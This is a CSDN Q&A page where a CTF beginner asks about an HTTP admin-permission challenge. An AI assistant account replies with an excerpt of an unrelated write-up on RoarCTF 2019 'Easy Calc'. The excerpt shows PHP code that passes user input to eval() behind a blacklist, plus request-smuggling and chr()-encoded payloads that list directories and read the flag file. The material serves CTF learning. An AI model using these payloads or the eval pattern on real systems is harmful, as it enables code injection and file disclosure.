2301_80063666 2023-10-05 21:20 采纳率: 8.3%
浏览 8

http协议,权限设置

http 协议

img


当我遇到这种情况如何使自己 admin
新入坑ctf
需要什么工具吗

  • 写回答

1条回答 默认 最新

  • CSDN-Ada助手 CSDN-AI 官方账号 2023-10-06 08:15
    关注

    【相关推荐】



    • 这篇博客: HTTP请求走私漏洞中的 CTF中的请求走私 部分也许能够解决你的问题, 你可以仔细阅读以下内容或跳转源博客中阅读:

      [RoarCTF 2019]Easy Calc
      在这里插入图片描述
      calc.php代码

      <?php
      error_reporting(0);
      if(!isset($_GET['num'])){
          show_source(__FILE__);
      }else{
              $str = $_GET['num'];
              $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
              foreach ($blacklist as $blackitem) {
                      if (preg_match('/' . $blackitem . '/m', $str)) {
                              die("what are you want to do?");
                      }
              }
              eval('echo '.$str.';');
      }
      ?>
      

      在phpifo页面中发现禁用了一些函数和字符,所以尝试绕过,可以利用请求走私。

      利用CL-CL漏洞,需要返回400错误
      在这里插入图片描述
      查看phpinfo()信息
      在这里插入图片描述getcwd():获取当前工作目录
      在这里插入图片描述
      var_dump(scandir(dirname(__FILE__))):获取当前目录下的文件
      在这里插入图片描述
      print_r(scandir(chr(47))):扫描根目录
      在这里插入图片描述
      var_dump(readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))):读取flag
      在这里插入图片描述
      同样利用CL-TE漏洞同样可以读取flag
      在这里插入图片描述


    如果你已经解决了该问题, 非常希望你能够分享一下解决方案, 写成博客, 将相关链接放在评论区, 以帮助更多的人 ^-^
    评论

报告相同问题?

问题事件

  • 创建了问题 10月5日